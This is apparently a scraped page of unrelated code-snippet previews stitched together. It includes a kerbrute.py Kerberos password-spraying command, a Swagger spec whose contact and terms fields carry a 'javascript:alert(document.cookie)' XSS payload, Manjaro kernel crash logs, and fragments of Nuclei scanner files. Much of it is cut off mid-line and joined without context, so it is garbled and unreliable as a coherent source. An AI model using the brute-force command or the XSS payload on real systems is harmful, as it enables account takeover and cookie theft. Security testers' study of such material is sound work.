With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
swagger: "2.0", | |
info: | |
title: "Swagger Sample App", | |
description: "Please to click Terms of service" | |
termsOfService: "javascript:alert(document.cookie)" | |
contact: | |
name: "API Support", | |
url: "javascript:alert(document.cookie)", | |
email: "javascript:alert(document.cookie)" | |
version: "1.0.1" |
package main | |
import ( | |
"fmt" | |
"io/ioutil" | |
"strings" | |
) | |
/* | |
Save Output of aws command to file with `filelist.txt` and run |
System: | |
Kernel: 5.13.12-1-MANJARO arch: x86_64 bits: 64 compiler: gcc v: 11.1.0 | |
parameters: BOOT_IMAGE=/boot/vmlinuz-5.13-x86_64 | |
root=UUID=b712d765-f670-4792-b011-891fe800908a rw quiet | |
resume=UUID=0ac477c0-b48b-4bb0-aece-1de77c9adbdc udev.log_priority=3 | |
Desktop: KDE Plasma v: 5.26.2 tk: Qt v: 5.15.6 info: latte-dock | |
wm: kwin_x11 vt: 1 dm: SDDM Distro: Manjaro Linux base: Arch Linux | |
Machine: | |
Type: Laptop System: ASUSTeK product: TUF Gaming FX705DY_FX705DY v: 1.0 | |
serial: <superuser required> |
BUG: unable to handle page fault for address: ffffa994d0154000 | |
kernel: #PF: supervisor read access in kernel mode | |
kernel: #PF: error_code(0x0000) - not-present page | |
kernel: PGD 100000067 P4D 100000067 PUD 1001be067 PMD 0 | |
kernel: Oops: 0000 [#1] PREEMPT SMP NOPTI | |
kernel: CPU: 7 PID: 314 Comm: systemd-udevd Not tainted 5.15.76-1-MANJARO #1 027fc9b2d7c7b52079a218e731621eab448a01c8 | |
kernel: Hardware name: ASUSTeK COMPUTER INC. TUF Gaming FX705DY_FX705DY/FX705DY, BIOS FX705DY.315 03/09/2020 | |
kernel: RIP: 0010:memcpy_fromio+0x23/0x50 | |
kernel: Code: cc cc cc cc cc cc cc 0f 1f 44 00 00 48 85 d2 74 28 40 f6 c6 01 75 37 48 83 fa 01 76 06 40 f6 c6 02 75 23 48 89 d1 48 c1 e9 02 <f3> a5 f6 c2 02 74 02 66 a5 f6 c2 01 74 01 a4 31 d2 31 c9 31 f6 31 | |
kernel: RSP: 0018:ffffa994c3343920 EFLAGS: 00010216 |
Nov 04 00:09:52.983464 Monarch kernel: Linux version 5.13.12-1-MANJARO (builduser@fv-az82-699) (gcc (GCC) 11.1.0, GNU ld (GNU Binutils) 2.36.1) #1 SMP PREEMPT Wed Aug 18 08:06:42 UTC 2021 | |
Nov 04 00:09:52.983495 Monarch kernel: Command line: BOOT_IMAGE=/boot/vmlinuz-5.13-x86_64 root=UUID=b712d765-f670-4792-b011-891fe800908a rw quiet resume=UUID=0ac477c0-b48b-4bb0-aece-1de77c9adbdc udev.log_priority=3 | |
Nov 04 00:09:52.983507 Monarch kernel: x86/fpu: Supporting XSAVE feature 0x001: 'x87 floating point registers' | |
Nov 04 00:09:52.983516 Monarch kernel: x86/fpu: Supporting XSAVE feature 0x002: 'SSE registers' | |
Nov 04 00:09:52.983524 Monarch kernel: x86/fpu: Supporting XSAVE feature 0x004: 'AVX registers' | |
Nov 04 00:09:52.983532 Monarch kernel: x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256 | |
Nov 04 00:09:52.983542 Monarch kernel: x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'compacted' format. | |
Nov 04 00:09:52.983551 Monarch kernel: BIOS-provided physical RAM map: | |
Nov 04 00:09:52.983561 |
Nov 04 00:07:25.501438 Monarch kernel: Linux version 5.15.76-1-MANJARO (builduser@fv-az214-469) (gcc (GCC) 12.2.0, GNU ld (GNU Binutils) 2.39.0) #1 SMP PREEMPT Sat Oct 29 14:22:16 UTC 2022 | |
Nov 04 00:07:25.501460 Monarch kernel: Command line: BOOT_IMAGE=/boot/vmlinuz-5.15-x86_64 root=UUID=b712d765-f670-4792-b011-891fe800908a rw quiet resume=UUID=0ac477c0-b48b-4bb0-aece-1de77c9adbdc udev.log_priority=3 | |
Nov 04 00:07:25.501473 Monarch kernel: x86/fpu: Supporting XSAVE feature 0x001: 'x87 floating point registers' | |
Nov 04 00:07:25.501481 Monarch kernel: x86/fpu: Supporting XSAVE feature 0x002: 'SSE registers' | |
Nov 04 00:07:25.501490 Monarch kernel: x86/fpu: Supporting XSAVE feature 0x004: 'AVX registers' | |
Nov 04 00:07:25.501498 Monarch kernel: x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256 | |
Nov 04 00:07:25.501507 Monarch kernel: x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'compacted' format. | |
Nov 04 00:07:25.501516 Monarch kernel: signal: max sigframe size: 1776 | |
Nov 04 00:07:25.501525 |
{ | |
"version": "2.1.0", | |
"$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", | |
"runs": [ | |
{ | |
"tool": { | |
"driver": { | |
"name": "Nuclei", | |
"organization": "ProjectDiscovery", | |
"product": "Nuclei", |
package benchmarks | |
import ( | |
"encoding/base64" | |
"fmt" | |
"testing" | |
"github.com/Knetic/govaluate" | |
"github.com/dop251/goja" | |
"github.com/stretchr/testify/require" |
{ | |
"schema": "{\r\n \"$defs\": {\r\n \"AttackTypeHolder\": {\r\n \"enum\": [\r\n \"batteringram\",\r\n \"pitchfork\",\r\n \"clusterbomb\"\r\n ],\r\n \"markdownDescription\": \"Attack is the type of payload combinations to perform\",\r\n \"title\": \"attack is the payload combination\",\r\n \"type\": \"string\"\r\n },\r\n \"Classification\": {\r\n \"additionalProperties\": false,\r\n \"properties\": {\r\n \"cpe\": {\r\n \"examples\": [\r\n \"cpe:\/a:vendor:product:version\"\r\n ],\r\n \"markdownDescription\": \"CPE for the template\",\r\n \"title\": \"cpe for the template\",\r\n \"type\": \"string\"\r\n },\r\n \"cve-id\": {\r\n \"$ref\": \"#\/$defs\/StringOrSlice\",\r\n \"markdownDescription\": \"CVE IDs for the template\",\r\n \"title\": \"cve ids for the template\"\r\n },\r\n \"cvss-metrics\": {\r\n \"examples\": [\ |